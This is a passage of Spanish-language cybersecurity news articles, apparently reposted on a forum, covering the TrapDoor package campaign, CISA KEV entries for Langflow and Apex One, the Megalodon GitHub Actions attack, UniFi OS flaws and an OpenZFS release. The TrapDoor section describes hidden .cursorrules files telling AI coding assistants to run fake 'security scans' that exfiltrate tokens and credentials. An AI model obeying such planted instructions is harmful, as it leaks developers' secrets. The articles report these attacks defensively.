Los paquetes maliciosos detectados en PyPI estaban diseñados para activarse automáticamente al importarse dentro de proyectos Python. Entre ellos destacan:

• crypto-wallet-security
• data-pipeline-check
• DeFi-Risk-Scanner
• env-loader-cli
• eth-security-auditor
• git-config-sync
• solidity-build-guard

El comportamiento de estos paquetes era especialmente peligroso porque descargaban código JavaScript remoto desde un dominio controlado por los atacantes y lo ejecutaban utilizando Node.js mediante el comando node -e.

Esta técnica permite modificar el comportamiento del malware en tiempo real sin necesidad de publicar nuevas versiones en PyPI, dificultando enormemente la detección y mitigación.

Cómo funciona el malware TrapDoor

TrapDoor utiliza distintas rutas de ejecución dependiendo del ecosistema objetivo:

En npm

El malware se activa mediante:

• Hooks postinstalación
• Dependencias ocultas
• Scripts automatizados

En Rust / You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Se aprovecha el archivo:

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Este script permite ejecutar código durante la compilación del paquete.

En Python / PyPI

El malware se activa:

• Durante la importación del módulo
• Descargando payloads remotos en JavaScript

La combinación de estas técnicas demuestra un conocimiento profundo de los flujos de desarrollo modernos y de los mecanismos internos de cada ecosistema.

TrapDoor introduce ataques dirigidos a herramientas de inteligencia artificial

Uno de los aspectos más preocupantes de esta campaña es el abuso de herramientas basadas en IA utilizadas por desarrolladores.

Los atacantes implantaron archivos ocultos como:

• .cursorrules
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Estos archivos contenían instrucciones diseñadas específicamente para manipular asistentes de inteligencia artificial y herramientas de codificación automatizada.

El objetivo era inducir a los sistemas de IA a realizar supuestos "escaneos de seguridad" que terminaban exfiltrando secretos, tokens y credenciales de los proyectos afectados.

Además, los atacantes intentaron insertar estas instrucciones ocultas mediante pull requests en proyectos populares de código abierto relacionados con IA, incluyendo repositorios ampliamente utilizados dentro de la comunidad tecnológica.

Esta evolución marca un nuevo nivel en los ataques a la cadena de suministro, donde ya no solo se comprometen paquetes de software, sino también los flujos de trabajo impulsados por inteligencia artificial.

El auge de los ataques a la cadena de suministro de software

Los ataques supply chain se han convertido en una de las amenazas más peligrosas para empresas y desarrolladores debido al enorme nivel de confianza depositado en repositorios oficiales como npm, PyPI y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

TrapDoor demuestra cómo los ciberdelincuentes están evolucionando rápidamente para comprometer:

• Entornos DevOps
• Infraestructura cloud
• Repositorios de código
• Wallets cripto
• Sistemas automatizados de IA
• Pipelines CI/CD

El hecho de que los paquetes aparenten ser herramientas legítimas relacionadas con blockchain, auditoría de seguridad o automatización de IA aumenta considerablemente las probabilidades de infección.

Cómo protegerse de campañas como TrapDoor

Para reducir el riesgo de compromiso frente a este tipo de amenazas, los expertos recomiendan:

Verificar siempre los paquetes instalados

Antes de instalar dependencias:

• Revisar reputación del autor
• Analizar historial del paquete
• Verificar número de descargas
• Validar firmas y hashes

Auditar dependencias automáticamente

Implementar herramientas de seguridad que detecten:

• Typosquatting
• Dependencias sospechosas
• Scripts postinstalación maliciosos
• Comportamientos anómalos

Restringir ejecución automática

Deshabilitar cuando sea posible:

• Scripts postinstall
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no verificados
• Importaciones dinámicas remotas

Segmentar secretos y credenciales

Nunca almacenar:

• Tokens AWS
• Claves privadas
• Credenciales GitHub
• Variables sensibles

directamente dentro del entorno de desarrollo.

Supervisar entornos de IA

Las herramientas de inteligencia artificial utilizadas en programación deben ser monitoreadas para evitar manipulación mediante instrucciones ocultas.

TrapDoor evidencia una nueva generación de amenazas

La campaña TrapDoor confirma que los actores maliciosos están adaptando sus tácticas a las nuevas tecnologías utilizadas por desarrolladores modernos. El uso simultáneo de npm, PyPI y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login demuestra una estrategia coordinada capaz de impactar múltiples lenguajes y plataformas al mismo tiempo.

Más preocupante aún es la integración de técnicas dirigidas contra herramientas de inteligencia artificial y flujos de contribución open source, lo que podría redefinir el panorama de amenazas en los próximos años.

La seguridad de la cadena de suministro ya no depende únicamente del código que escriben los desarrolladores, sino también de las dependencias, automatizaciones e incluso asistentes de IA que participan en el proceso de desarrollo.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La Cybersecurity and Infrastructure Security Agency, conocida como CISA, añadió oficialmente dos nuevas vulnerabilidades críticas que afectan a Langflow y Trend Micro Apex One a su catálogo de Vulnerabilidades Explotadas Conocidas (KEV), citando evidencia de explotación activa en ataques reales.

La decisión refleja la creciente preocupación de las autoridades estadounidenses por el aumento de campañas de ciberataques dirigidas contra plataformas empresariales, entornos cloud y soluciones de inteligencia artificial que manejan información sensible.

Las vulnerabilidades identificadas son:

• CVE-2025-34291 – Vulnerabilidad crítica en Langflow con puntuación CVSS 9.4.
• CVE-2026-34926 – Vulnerabilidad de recorrido de directorios en Trend Micro Apex One con puntuación CVSS 6.7.

CISA ordenó a las agencias federales estadounidenses aplicar las mitigaciones y actualizaciones necesarias antes del 4 de junio de 2026 para reducir riesgos de compromiso.

¿Qué significa entrar en el catálogo KEV de CISA?

El catálogo KEV (Known Exploited Vulnerabilities) de la Cybersecurity and Infrastructure Security Agency reúne vulnerabilidades que están siendo explotadas activamente por actores maliciosos en el mundo real.

Cuando una vulnerabilidad es añadida al listado KEV, normalmente implica que:

• Existen ataques confirmados en curso.
• La explotación representa una amenaza significativa para organizaciones públicas y privadas.
• Las agencias federales deben aplicar parches de forma obligatoria dentro de plazos establecidos.

La inclusión de Langflow y Trend Micro Apex One en este catálogo evidencia el alto nivel de riesgo asociado a ambas fallas.

CVE-2025-34291: vulnerabilidad crítica en Langflow permite ejecución remota de código

La vulnerabilidad más grave del anuncio corresponde a CVE-2025-34291, una falla crítica en Langflow con una puntuación CVSS de 9.4.

Langflow es una plataforma utilizada para desarrollar aplicaciones basadas en modelos de lenguaje (LLM) e inteligencia artificial mediante interfaces visuales y automatización de flujos de trabajo.

Según investigaciones de Obsidian Security publicadas en diciembre de 2025, la vulnerabilidad combina tres debilidades críticas:

• Configuración CORS excesivamente permisiva.
• Ausencia de protección CSRF.
• Un endpoint que permite ejecución de código por diseño.

La combinación de estos factores posibilita que un atacante remoto ejecute código arbitrario y obtenga control completo del sistema comprometido.

El impacto de la vulnerabilidad en Langflow puede ser devastador

Los expertos de Obsidian Security advirtieron que el impacto potencial de CVE-2025-34291 va mucho más allá del compromiso de una sola instancia.

La explotación exitosa podría permitir el acceso a:

• Tokens de acceso cloud
• Claves API
• Credenciales SaaS
• Secretos empresariales
• Integraciones automatizadas
• Entornos DevOps conectados

CitarLa empresa explicó que:

"La explotación exitosa no solo compromete la instancia de Langflow, sino que también expone todos los tokens de acceso sensibles y las claves API almacenadas en el espacio de trabajo".

Esto podría desencadenar compromisos en cascada sobre múltiples servicios cloud integrados dentro de la infraestructura corporativa.

Grupo iraní MuddyWater explota activamente la vulnerabilidad

La situación se volvió aún más crítica después de que investigadores de Ctrl-Alt-Intel revelaran en marzo de 2026 que el grupo patrocinado por el Estado iraní MuddyWater estaba explotando activamente CVE-2025-34291.

Según el análisis, los atacantes utilizaron la vulnerabilidad como vector inicial de acceso para infiltrarse en redes objetivo.

MuddyWater es conocido por ejecutar operaciones avanzadas de ciberespionaje dirigidas contra:

• Gobiernos
• Infraestructura crítica
• Empresas tecnológicas
• Entidades financieras
• Organizaciones de telecomunicaciones

La explotación de plataformas de IA como Langflow demuestra cómo los actores estatales están ampliando rápidamente sus objetivos hacia tecnologías emergentes basadas en inteligencia artificial.

Trend Micro Apex One también bajo explotación activa

La segunda vulnerabilidad añadida por CISA corresponde a CVE-2026-34926, una falla de recorrido de directorios que afecta versiones locales de Trend Micro Apex One.

Según Trend Micro, la vulnerabilidad podría permitir que un atacante local preautenticado modifique una tabla de claves interna del servidor para desplegar código malicioso hacia agentes instalados en la red corporativa.

CitarLa compañía confirmó además que:

"Observó al menos un caso de intento de explotación activa en la naturaleza".

Aunque la explotación requiere acceso administrativo previo al servidor Apex One, el riesgo sigue siendo elevado debido a que estas plataformas poseen amplios privilegios dentro de entornos empresariales.

Plataformas EDR se convierten en objetivos prioritarios

Las soluciones EDR y plataformas de protección de endpoints como Trend Micro Apex One se han convertido en objetivos extremadamente atractivos para actores maliciosos.

Esto ocurre porque dichas herramientas:

• Poseen acceso privilegiado a endpoints corporativos.
• Controlan políticas de seguridad.
• Gestionan múltiples dispositivos simultáneamente.
• Pueden distribuir software dentro de redes empresariales.

Un compromiso exitoso permitiría a los atacantes desplegar malware, ransomware o puertas traseras a gran escala dentro de organizaciones afectadas.

CISA ordena mitigaciones inmediatas antes del 4 de junio

Debido al riesgo asociado a ambas vulnerabilidades, la Cybersecurity and Infrastructure Security Agency estableció como fecha límite el 4 de junio de 2026 para que las agencias del Poder Ejecutivo Civil Federal (FCEB) implementen las actualizaciones y mitigaciones necesarias.

Las autoridades recomiendan:

• Aplicar inmediatamente los parches disponibles.
• Restringir accesos administrativos.
• Supervisar logs y actividad sospechosa.
• Segmentar sistemas críticos.
• Rotar credenciales comprometidas.
• Implementar autenticación multifactor (MFA).

La explotación activa de vulnerabilidades críticas sigue siendo uno de los principales vectores utilizados por ciberdelincuentes y grupos patrocinados por Estados para comprometer infraestructuras corporativas.

Las plataformas de IA y seguridad están en la mira de los atacantes

El nuevo movimiento de CISA confirma una tendencia cada vez más evidente dentro del panorama de amenazas actual: los atacantes están enfocándose agresivamente en plataformas estratégicas utilizadas para automatización, inteligencia artificial y protección empresarial.

La explotación de fallos en Langflow y Trend Micro Apex One demuestra que los actores de amenazas buscan maximizar impacto atacando herramientas con acceso privilegiado a datos, pipelines cloud y redes corporativas.

A medida que las organizaciones aceleran la adopción de tecnologías IA y automatización DevOps, la superficie de ataque continúa expandiéndose, obligando a empresas y gobiernos a reforzar sus estrategias de ciberseguridad frente a campañas cada vez más sofisticadas y persistentes.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Investigadores de ciberseguridad han descubierto una sofisticada campaña automatizada denominada Megalodon, responsable de comprometer miles de repositorios en GitHub mediante commits maliciosos diseñados para robar secretos críticos de entornos CI/CD, credenciales cloud y claves privadas.

De acuerdo con un informe publicado por SafeDep, los atacantes enviaron 5.718 commits maliciosos contra 5.561 repositorios GitHub en apenas seis horas, marcando uno de los ataques automatizados de cadena de suministro más agresivos observados hasta la fecha.

La operación evidencia la creciente profesionalización de los ataques dirigidos a ecosistemas DevOps y plataformas de desarrollo modernas, donde los pipelines automatizados se han convertido en objetivos prioritarios para actores maliciosos avanzados.

Cómo funciona la campaña Megalodon

Según los investigadores, los atacantes utilizaron cuentas desechables de GitHub junto con identidades de autores falsificadas para hacer pasar los commits maliciosos como actualizaciones rutinarias de integración continua (CI).

Entre los nombres utilizados por los atacantes se encuentran:

• build-bot
• auto-ci
• ci-bot
• pipeline-bot

Los commits incluían flujos de trabajo maliciosos de GitHub Actions que ejecutaban cargas útiles Bash codificadas en Base64.

Estas cargas útiles estaban diseñadas para recopilar y exfiltrar información sensible desde entornos CI/CD comprometidos hacia un servidor de comando y control (C2).

El servidor utilizado por los atacantes fue identificado en la dirección IP 216.126.225[.]129:8443.

Credenciales y secretos robados por Megalodon

El malware desplegado durante la campaña Megalodon posee capacidades extremadamente amplias para robar información crítica relacionada con infraestructuras cloud y pipelines DevOps.

Entre los datos objetivo identificados por SafeDep destacan:

• Variables de entorno CI/CD
• Credenciales de Amazon Web Services (AWS)
• Tokens de acceso de Google Cloud
• Credenciales de Microsoft Azure IMDS
• Tokens OIDC de GitHub Actions
• GITHUB_TOKEN
• Tokens CI/CD de GitLab y Bitbucket
• Claves privadas SSH
• Configuraciones Docker y Kubernetes
• Tokens HashiCorp Vault
• Credenciales Terraform
• JWTs y claves API
• Archivos .env
• service-account.json
• credentials.json
• Historiales de shell
• Claves privadas PEM
• Cadenas de conexión a bases de datos

El malware también extraía secretos utilizando más de 30 patrones de expresiones regulares capaces de detectar tokens cloud, credenciales empresariales y claves criptográficas sensibles.

GitHub Actions convertido en arma de ataque

Uno de los aspectos más peligrosos de la campaña es el abuso de GitHub Actions como mecanismo de propagación y ejecución de malware.

Los atacantes añadieron workflows maliciosos que se ejecutaban automáticamente durante procesos de integración continua, aprovechando la confianza existente dentro de los pipelines DevOps.

SafeDep identificó dos variantes principales utilizadas durante los ataques:

SysDiag

La variante SysDiag añadía un workflow automatizado que se ejecutaba con cada evento push o pull request.

Su objetivo era maximizar la propagación y comprometer la mayor cantidad posible de pipelines CI/CD.

Optimize-Build

La segunda variante, llamada Optimize-Build, utilizaba el disparador workflow_dispatch, permitiendo ejecutar manualmente el flujo malicioso bajo demanda.

Este enfoque era más sigiloso y estaba orientado a mantener persistencia operativa evitando detecciones automáticas.

Tiledesk entre los proyectos afectados

Uno de los paquetes comprometidos durante la campaña fue @tiledesk/tiledesk-server, donde los investigadores detectaron una carga útil Bash codificada en Base64 incrustada dentro de un workflow de GitHub Actions.

En este caso, el objetivo principal no era comprometer directamente a los usuarios finales del paquete npm, sino atacar específicamente los runners CI/CD asociados al proyecto.

Esto demuestra cómo los atacantes están priorizando cada vez más la infraestructura de desarrollo y automatización sobre los dispositivos tradicionales.

Los atacantes utilizaron cuentas desechables y credenciales robadas

La operación Megalodon fue altamente automatizada y utilizó múltiples técnicas para ocultar la identidad real de los operadores.

Los investigadores descubrieron que los atacantes:

• Crearon cuentas GitHub desechables con nombres aleatorios de ocho caracteres.
• Falsificaron identidades mediante git config.
• Utilizaron PATs comprometidos.
• Aprovecharon claves de despliegue robadas.

Los mensajes de commit imitaban tareas rutinarias de mantenimiento CI/CD para reducir sospechas y aumentar las probabilidades de que los cambios fueran fusionados por los mantenedores legítimos.

TeamPCP y la nueva era de ataques a la cadena de suministro

La campaña Megalodon surge en medio de una ola creciente de ataques asociados al grupo TeamPCP, el cual ha estado explotando ecosistemas de código abierto para propagar malware y comprometer desarrolladores.

Según expertos de OX Security, estos ataques representan una nueva etapa en la evolución de las amenazas supply chain.

• El investigador Moshe Siman Tov Bustan afirmó:
• "Hemos entrado en una nueva era de ataques a la cadena de suministro".

El grupo TeamPCP ya ha sido vinculado a incidentes que afectaron organizaciones y proyectos conocidos como:

• OpenAI
• Mistral AI
• Grafana Labs
• TanStack

Ataques similares a gusanos se propagan entre proyectos open source

Los expertos advierten que los ataques modernos de cadena de suministro funcionan de manera similar a gusanos informáticos.

Cada repositorio comprometido se convierte en una nueva plataforma para atacar otros proyectos relacionados, creando una propagación cíclica extremadamente difícil de contener.

Además, TeamPCP aparentemente mantiene vínculos con grupos de extorsión y ciberdelincuencia como:

• LAPSUS$
• BreachForums
• VECT

Los investigadores también detectaron motivaciones geopolíticas dentro de algunas campañas, incluyendo despliegue de malware destructivo en sistemas ubicados en Irán e Israel.

npm invalida tokens para frenar ataques

Como respuesta a la creciente oleada de ataques supply chain, npm invalidó tokens granulares con permisos de escritura que podían eludir mecanismos de autenticación multifactor (2FA).

La plataforma también recomendó migrar hacia Trusted Publishing para reducir riesgos asociados al robo de credenciales.

Sin embargo, expertos de Socket advirtieron que la medida solo proporciona un alivio temporal.

CitarSegún la compañía:

"El reinicio da margen de respiro. No cierra el agujero subyacente".

Paquetes npm maliciosos roban claves privadas de criptomonedas

Paralelamente, investigadores descubrieron otra campaña maliciosa operada por una cuenta desechable llamada "polymarketdev".

El atacante publicó nueve paquetes npm fraudulentos que imitaban herramientas CLI relacionadas con Polymarket para robar claves privadas Ethereum y Polygon.

Los paquetes incluían scripts postinstall que mostraban falsas solicitudes de configuración de wallets y enviaban las claves privadas capturadas hacia un servidor controlado por los atacantes.

Entre los paquetes identificados destacan:

• polymarket-trading-cli
• polymarket-bot
• Polymarket-terminal
• Polymarket-AI-agent

El ecosistema open source enfrenta una crisis de seguridad

La campaña Megalodon confirma que el ecosistema de software open source atraviesa una de las crisis de seguridad más complejas de los últimos años.

Los atacantes ya no buscan únicamente comprometer usuarios finales, sino infiltrarse directamente en pipelines de desarrollo, repositorios GitHub y cadenas de suministro de software para maximizar el impacto de sus operaciones.

La automatización masiva de commits maliciosos, el robo de secretos cloud y la explotación de GitHub Actions reflejan cómo los actores de amenazas están evolucionando rápidamente sus tácticas para atacar infraestructuras críticas de desarrollo moderno.

Ante este panorama, los expertos recomiendan fortalecer controles de acceso, implementar revisiones estrictas de commits, proteger secretos CI/CD y adoptar modelos Zero Trust dentro de entornos DevOps y pipelines de automatización.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Trend Micro ha publicado actualizaciones de seguridad urgentes para corregir una vulnerabilidad zero-day crítica en Trend Micro Apex One que ya está siendo explotada activamente en ataques dirigidos contra sistemas Windows.

La falla, identificada como CVE-2026-34926, afecta específicamente a la versión local (on-premise) de Apex One y podría permitir a atacantes con privilegios administrativos inyectar código malicioso en servidores comprometidos y distribuirlo posteriormente a múltiples agentes de seguridad desplegados dentro de la infraestructura empresarial.

El incidente vuelve a poner en el centro de atención los riesgos asociados a las plataformas de protección de endpoints y demuestra cómo incluso soluciones de seguridad corporativa pueden convertirse en objetivos prioritarios para actores de amenazas avanzadas.

¿Qué es Trend Micro Apex One y por qué es importante?

Trend Micro Apex One es una plataforma de seguridad de endpoints ampliamente utilizada en entornos corporativos y gubernamentales.

La solución ofrece protección avanzada contra múltiples amenazas cibernéticas, incluyendo:

• Malware avanzado
• Ransomware
• Ataques sin archivos (fileless attacks)
• Amenazas web
• Explotación de vulnerabilidades
• Ataques dirigidos

Debido a su integración profunda dentro de redes empresariales, cualquier vulnerabilidad crítica en Apex One representa un riesgo significativo para organizaciones que dependen de esta tecnología para proteger activos críticos.

CVE-2026-34926: vulnerabilidad zero-day de recorrido de directorios

La vulnerabilidad zero-day rastreada como CVE-2026-34926 corresponde a un fallo de Path Traversal o recorrido de directorios dentro del servidor Apex One local.

Según explicó Trend Micro, un atacante con acceso administrativo al servidor puede modificar una tabla de claves interna para inyectar código malicioso que posteriormente será desplegado hacia los agentes instalados en sistemas afectados.

La compañía detalló que:

Citar"Una vulnerabilidad de recorrido de directorios en el servidor Apex One (local) podría permitir que un atacante local preautenticado modifique una tabla de claves en el servidor para inyectar código malicioso que se despliegue a agentes en las instalaciones afectadas".

Aunque la explotación requiere acceso previo y privilegios administrativos, la naturaleza centralizada de Apex One convierte esta falla en una amenaza extremadamente peligrosa para entornos empresariales.

Ataques reales ya explotan la vulnerabilidad zero-day

Uno de los aspectos más alarmantes del incidente es que la vulnerabilidad ya fue utilizada en ataques reales antes de la publicación de los parches.

Trend Micro confirmó que sus sistemas de inteligencia de amenazas TrendAI detectaron al menos un intento activo de explotación en la naturaleza.

Esto convierte oficialmente a CVE-2026-34926 en una vulnerabilidad zero-day explotada activamente, elevando significativamente el nivel de riesgo para organizaciones que aún no han aplicado las actualizaciones de seguridad.

Las vulnerabilidades de este tipo suelen ser utilizadas por grupos APT, operadores de ransomware y actores patrocinados por Estados para comprometer infraestructuras corporativas críticas.

CISA ordena a agencias federales actualizar antes del 4 de junio

La gravedad de la vulnerabilidad llevó a la Cybersecurity and Infrastructure Security Agency a añadir CVE-2026-34926 a su catálogo de Vulnerabilidades Explotadas Activamente (KEV).

Como parte de la directiva federal, CISA ordenó a las agencias gubernamentales estadounidenses aplicar los parches de seguridad antes del próximo 4 de junio.

CitarLa agencia advirtió que:

"Este tipo de vulnerabilidades son vectores de ataque frecuentes para actores cibernéticos maliciosos y suponen riesgos significativos para la empresa federal".

Además, recomendó seguir las mitigaciones proporcionadas por el fabricante o suspender temporalmente el uso del producto en caso de no poder implementar correcciones de seguridad inmediatas.

La inclusión en el catálogo KEV suele considerarse un fuerte indicador de explotación activa y alta peligrosidad.

Trend Micro también corrige siete fallos de escalada de privilegios

Además del zero-day principal, Trend Micro lanzó actualizaciones adicionales para solucionar siete vulnerabilidades locales de escalada de privilegios en el agente Apex One Standard Endpoint Protection (SEP).

Estas fallas podrían permitir a atacantes ejecutar operaciones privilegiadas si previamente logran ejecutar código de bajo privilegio en sistemas objetivo.

Aunque estas vulnerabilidades requieren acceso inicial al dispositivo, siguen representando un riesgo importante en escenarios posteriores a la intrusión, especialmente en ataques avanzados de movimiento lateral dentro de redes corporativas.

Trend Micro Apex One ha sido objetivo recurrente de ataques

Los productos Apex One de Trend Micro han sido atacados repetidamente en los últimos años mediante campañas que explotan vulnerabilidades críticas y zero-days.

En agosto de 2025, la empresa corrigió la vulnerabilidad crítica CVE-2025-54948, una falla de ejecución remota de código (RCE) explotada activamente en ataques reales.

Asimismo, en septiembre de 2022 y septiembre de 2023, la compañía abordó otros dos zero-days de Apex One identificados como:

• CVE-2022-40139
• CVE-2023-41179

Ambas vulnerabilidades también fueron explotadas antes de la disponibilidad de parches.

Actualmente, la Cybersecurity and Infrastructure Security Agency rastrea al menos 12 vulnerabilidades relacionadas con productos Trend Micro Apex que han sido utilizadas en ataques activos.

Riesgos para empresas y organizaciones

Las plataformas EDR y de protección de endpoints como Apex One poseen acceso privilegiado dentro de infraestructuras empresariales, lo que las convierte en objetivos extremadamente valiosos para ciberdelincuentes.

Si un atacante logra comprometer el servidor central de administración, puede obtener capacidades para:

• Distribuir malware a múltiples dispositivos
• Desactivar protecciones de seguridad
• Robar información sensible
• Ejecutar ransomware a gran escala
• Mantener persistencia dentro de la red

Precisamente por ello, las vulnerabilidades en soluciones de seguridad suelen recibir máxima prioridad por parte de agencias gubernamentales y equipos de respuesta ante incidentes.

Recomendaciones urgentes para administradores de TI

Los expertos en ciberseguridad recomiendan a las organizaciones afectadas tomar medidas inmediatas para minimizar riesgos asociados a CVE-2026-34926.

Entre las principales acciones recomendadas destacan:

• Aplicar inmediatamente los parches publicados por Trend Micro.
• Restringir accesos administrativos al servidor Apex One.
• Supervisar actividad sospechosa y logs del sistema.
• Implementar segmentación de red para servidores críticos.
• Revisar credenciales administrativas comprometidas.
• Habilitar autenticación multifactor (MFA).
• Realizar análisis forenses si existen indicios de intrusión.

La explotación activa de vulnerabilidades zero-day continúa representando una de las amenazas más críticas para organizaciones modernas, especialmente cuando afecta plataformas de seguridad con amplios privilegios dentro de redes corporativas.

El nuevo incidente de Trend Micro confirma que los productos de ciberseguridad siguen siendo un objetivo prioritario para actores maliciosos avanzados que buscan maximizar el impacto de sus operaciones ofensivas.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ubiquiti ha publicado actualizaciones de seguridad urgentes para corregir múltiples vulnerabilidades críticas en UniFi OS, una plataforma ampliamente utilizada para administrar redes empresariales, dispositivos de seguridad, videovigilancia y comunicaciones unificadas.

Las fallas, identificadas como CVE-2026-34908, CVE-2026-34909 y CVE-2026-34910, fueron clasificadas con la máxima gravedad debido a que podrían ser explotadas remotamente por atacantes sin privilegios previos. La situación genera preocupación en el sector de la ciberseguridad, especialmente porque actualmente existen cerca de 100.000 endpoints UniFi OS expuestos directamente a Internet, según datos de inteligencia recopilados por Censys.

Vulnerabilidades críticas en UniFi OS ponen en riesgo redes empresariales

UniFi OS es el núcleo operativo que impulsa las Consolas UniFi y coordina diversas aplicaciones empresariales como:

• UniFi Network
• UniFi Protect
• UniFi Access
• UniFi Talk
• UniFi Connect

Estas herramientas son utilizadas por organizaciones de todos los tamaños para gestionar redes corporativas, sistemas de videovigilancia, control de acceso físico y servicios de comunicación empresarial.

Sin embargo, las nuevas vulnerabilidades descubiertas podrían permitir a ciberdelincuentes comprometer completamente dispositivos vulnerables y obtener acceso a infraestructura crítica.

CVE-2026-34908: fallo crítico de control de acceso incorrecto

La primera vulnerabilidad crítica, rastreada como CVE-2026-34908, se origina por un problema de control de acceso incorrecto dentro de UniFi OS.

Un atacante remoto podría aprovechar esta debilidad para realizar cambios no autorizados en sistemas afectados, alterando configuraciones sensibles y comprometiendo la integridad de la plataforma.

Este tipo de vulnerabilidad es especialmente peligrosa en entornos corporativos debido a que puede abrir la puerta a modificaciones persistentes en dispositivos de red y sistemas de seguridad.

CVE-2026-34909: vulnerabilidad Path Traversal expone archivos internos

La segunda falla crítica, CVE-2026-34909, corresponde a una vulnerabilidad de Path Traversal.

Mediante su explotación, un atacante podría acceder a archivos internos del sistema operativo subyacente, incluyendo información sensible relacionada con cuentas del sistema.

Las vulnerabilidades de recorrido de directorios continúan siendo una de las técnicas favoritas de los atacantes debido a que permiten acceder a archivos restringidos sin necesidad de autenticación avanzada.

En escenarios más agresivos, este tipo de acceso podría utilizarse para extraer credenciales, configuraciones internas o preparar movimientos laterales dentro de una red empresarial.

CVE-2026-34910 permite inyección remota de comandos

La tercera vulnerabilidad de máxima gravedad identificada por Ubiquiti es CVE-2026-34910, una falla de validación incorrecta de entrada que puede derivar en ataques de inyección de comandos.

Según la compañía, un atacante con acceso a la red podría ejecutar comandos arbitrarios sobre dispositivos afectados, obteniendo potencialmente control total del sistema comprometido.

Las vulnerabilidades de ejecución remota de comandos representan uno de los escenarios más críticos dentro de la ciberseguridad moderna debido a que permiten desplegar malware, crear puertas traseras, instalar botnets o robar información sensible.

Ubiquiti también corrige otros dos fallos graves

Además de las tres vulnerabilidades críticas principales, Ubiquiti corrigió otros dos problemas importantes que afectan dispositivos UniFi OS:

• CVE-2026-33000: vulnerabilidad crítica de inyección de comandos.
• CVE-2026-34911: falla de divulgación de información clasificada como de alta severidad.

La empresa indicó que todas las vulnerabilidades fueron reportadas a través de su programa de recompensas de errores en HackerOne.

Aunque Ubiquiti no confirmó si estas fallas fueron explotadas activamente antes de la publicación de los parches, reconoció que los ataques requieren baja complejidad, aumentando significativamente el riesgo de explotación masiva.

Cerca de 100.000 dispositivos UniFi OS permanecen expuestos a Internet

Uno de los aspectos más preocupantes del incidente es la enorme superficie de exposición existente.

La firma de inteligencia de amenazas Censys actualmente rastrea aproximadamente 100.000 endpoints UniFi OS accesibles desde Internet, con casi 50.000 direcciones IP ubicadas en Estados Unidos.

Hasta el momento, no existe información pública que confirme cuántos dispositivos ya fueron actualizados y protegidos contra estas vulnerabilidades.

Los expertos en seguridad recomiendan aplicar inmediatamente las actualizaciones publicadas por Ubiquiti, restringir accesos administrativos desde Internet y segmentar adecuadamente las redes empresariales para minimizar riesgos.

Historial de vulnerabilidades críticas en productos Ubiquiti

Los productos de Ubiquiti han sido objetivo recurrente tanto de ciberdelincuentes como de grupos de amenazas patrocinados por Estados.

En marzo de este año, la compañía corrigió otra vulnerabilidad crítica en la aplicación UniFi Network, identificada como CVE-2026-22557, que podía permitir la toma de control de cuentas de usuario.

Simultáneamente, también solucionó CVE-2026-22558, una falla que posibilitaba la escalada de privilegios en dispositivos afectados.

Este patrón continuo de descubrimiento de vulnerabilidades demuestra el creciente interés de los actores maliciosos en infraestructuras de red empresariales y dispositivos IoT corporativos.

El FBI y CISA ya habían advertido sobre ataques a dispositivos Ubiquiti

Los antecedentes relacionados con dispositivos Ubiquiti reflejan un historial preocupante de explotación en campañas reales.

En febrero de 2024, el Federal Bureau of Investigation desmanteló la botnet Moobot, compuesta por routers Ubiquiti Edge OS comprometidos que eran utilizados por la inteligencia militar rusa GRU para ocultar tráfico malicioso en operaciones de ciberespionaje dirigidas contra Estados Unidos y aliados occidentales.

Asimismo, en abril de 2022, la Cybersecurity and Infrastructure Security Agency añadió la vulnerabilidad crítica CVE-2010-5330 de Ubiquiti AirOS a su catálogo de vulnerabilidades explotadas activamente.

En aquel momento, la agencia ordenó a las entidades federales proteger sus dispositivos en un plazo máximo de tres semanas debido al alto riesgo de explotación.

Administradores deben actualizar inmediatamente UniFi OS

Ante la gravedad de las vulnerabilidades recientemente descubiertas, los administradores de sistemas y equipos de seguridad deben actuar con rapidez para reducir la superficie de ataque.

Las principales recomendaciones incluyen:

• Actualizar inmediatamente UniFi OS a las versiones corregidas.
• Restringir el acceso remoto administrativo.
• Implementar autenticación multifactor (MFA).
• Segmentar dispositivos de red críticos.
• Supervisar logs y actividad sospechosa.
• Deshabilitar servicios innecesarios expuestos a Internet.

La explotación exitosa de estas vulnerabilidades podría derivar en robo de información, despliegue de malware, espionaje corporativo o incorporación de dispositivos a botnets utilizadas en campañas de ciberataques globales.

La nueva ola de fallos críticos en UniFi OS confirma nuevamente que los dispositivos de infraestructura de red continúan siendo uno de los objetivos prioritarios para actores maliciosos avanzados y grupos de ciberdelincuencia organizada.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

OpenZFS lanzó oficialmente la versión 2.4.2 de su rama estable, una actualización centrada principalmente en compatibilidad de kernel, estabilidad interna y correcciones críticas orientadas a entornos de almacenamiento profesional.

Aunque no incorpora nuevas funciones espectaculares ni cambios visuales llamativos, OpenZFS 2.4.2 representa un avance importante para administradores de sistemas, operadores de centros de datos y organizaciones que dependen de infraestructuras de almacenamiento basadas en Linux y FreeBSD.

El nuevo lanzamiento refuerza la compatibilidad con las versiones más recientes del kernel Linux, mejora la estabilidad de operaciones críticas como reconstrucciones de pools y dRAID, y corrige múltiples errores relacionados con integridad de datos y condiciones de carrera que podían afectar entornos complejos.

OpenZFS 2.4.2 añade soporte oficial para Linux 7.0

La principal novedad de OpenZFS 2.4.2 es la compatibilidad oficial con Linux 7.0.

Hasta ahora, la versión estable previa del proyecto ofrecía soporte formal únicamente hasta Linux 6.19, lo que comenzaba a generar problemas para administradores que ya estaban desplegando kernels más recientes en entornos de pruebas o producción.

Con esta nueva versión, OpenZFS amplía oficialmente su rango de compatibilidad desde Linux 4.18 hasta Linux 7.0, permitiendo mantener una única rama estable del sistema de archivos en infraestructuras heterogéneas.

Esto resulta especialmente relevante para:

• Centros de datos
• Infraestructuras híbridas
